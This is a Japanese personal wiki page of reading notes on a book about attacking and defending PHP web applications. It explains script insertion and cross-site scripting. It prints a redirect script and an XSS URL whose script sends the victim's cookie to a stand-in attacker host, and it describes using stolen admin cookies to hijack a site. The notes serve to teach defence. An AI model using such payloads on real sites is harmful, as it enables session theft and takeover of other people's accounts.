ノート/PHPサイバーテロの技法

サイトトップ

ノート
データ処理
├マイニング
├バスケット解析
├バスケット解析をＲで
├図書貸出をＲで
├モデルクラスタリング
└
テキストマイニング
├テキストマイニングTM
├TMとシソーラス
├PubMedをTM
├TMとMeSH
├TMとNLTK
├テキストマイニングとtagger
├医薬品添付文書ＤＢ
├論文の処理1
├剽窃１
├Bing検索
└
分子進化学
├分子進化学
└
Pythonと論文アクセス
├Pythonを使ってみる
├PythonでPubMed
├Pythonで...続き
└
Macメモ
├Script

&ref(): File not found: "favicon_story.txt" at page "ノート/ノート";

自信ないので
├Winのバッチ
│├スクリプト入門
│├バッチファイル
│├SETコマンド
│├自分のメモ
│└
└

メニュー編集

最新の5件

ノート
訪問者数　2244　　　　　　最終更新　2008-01-13 (日) 17:35:17

「PHPサーバーテロの技法」を読んでみる †

概要 †

• タイトル：「PHPサイバーテロの技法　攻撃と防御の実際」　著者：GIGOE（後藤峰陽、Xoopsプロジェクトでアクティブらしい）　発行：ソシム　ISBN978-4-88337-471-7　1,800円 　2005/11
  Amazonのページ で「なか見検索」可能
• 内容は、PHPで作ったWebサーバーに対する攻撃手法とその対策を論じたもの。非常に具体的にクラッキングコードとその対策が書かれていて面白い。主張としては、このような愚かな無防備ミスを繰り返してはいかんぞ、ということらしい。

本書で紹介している攻撃方法のいろいろ　 †

• 攻撃法を１４種に整理して紹介しているが、これらは何も特別なものではない。 ごく一般に議論されているScript InsertionやCross-Site Scripting, SQL Injectionなどと、 あとはPHPのもつ外見的弱さ、データベースシステム（MySQLやPostgreSQLや...） のもつ外見的な問題などである。
  決して「鬼の首を取った」話ではない。ごく常識的な問題の指摘なのだが、サイト作成者が忘れると（もしくは初心者が知らないと）痛い目にあう種類の話である。
• 対象としているのは、（主に？）掲示板・ＳＮＳ・ＣＭＳなどを含めてユーザが入力したものを表示するようなサイトをPHPで作った場合。まぁPHPでサイトを作るのはそういう用途が多いだろうと思う。

外枠の仕組いろいろ †

Script Insertion †

• サーバーへの入力の中に、余分なScriptを紛れ込ませる。
• サーバーで入力を（そのままの形で）表示する仕組がある（掲示板でメッセージを表示するなど）
• サーバーの入力チェックが甘いと、余分なScriptを取り込んでそのまま表示してしまう。
• Scriptとして直接できることは多くないが、クッキーを盗んだりして成りすまし認証回避などの準備に使われる。

• 例としてもし仮にサーバーがformで取り込んだ文字列をそのまま表示 （たとえばecho $_POST['fieldname'];）するような仕組の場合、$_POSTで得られる 文字列の中にJavaScriptが入っていると、そのままそれをページ上に表示する。 したがって、クライアント側のブラウザはそのScriptを実行する。
• 具体的にもぐりこませるScriptは、例に出ているのは

  <script>location.href="http://......";</script>

  といった「画面を飛ばす」程度のものであるが、他と組み合わせるといろいろできるらしい。

Cross Site Scripting (XSS) †

• XSSは、標的がブラウザとサーバーの持ち主であり、（例えば管理者の）ブラウザから出すアクセスに追加スクリプトを仕込むものである。
• 管理者のブラウザから（悪人の望む）アクセスを出させるには、メールなどでURLへ誘導して「踏ませる」。管理人が間違ってこのURLを踏むと、その中に書かれた追加スクリプトによって問題行動を起こさせる。
  具体的に踏ませるスクリプトの例としては

  http://gisei_host/index.php?id=<script>document.location='http://akunin_host/?'
  +document.cookie;</script>

  もしgisei_hostのPHPで　echo $_GET['id']; などとしていれば、上記のスクリプトをブラウザにダウンロードして実行してしまうので、akunin_hostへアクセスしcookieを付加してしまう。
• アウトプットはブラウザ画面に出してみるわけに行かないので（悪人はブラウザの前に居ないから）、右端の悪人の持つサーバーへのアクセスをさせそのアクセスの中にアウトプットをもらす方法を仕込む。具体的には悪人サーバーへのアクセス要求に盗みたい情報を付加しておき、それをアクセスログに書かせることによって、覗き見る。
• 具体的には、たとえばＩＤとクッキー情報を盗み出すことが考えられる。特に管理者のＩＤとクッキー情報（パスワードの可能性あり）を盗むと、そのサーバーアプリに対して管理者としてのっとることができる。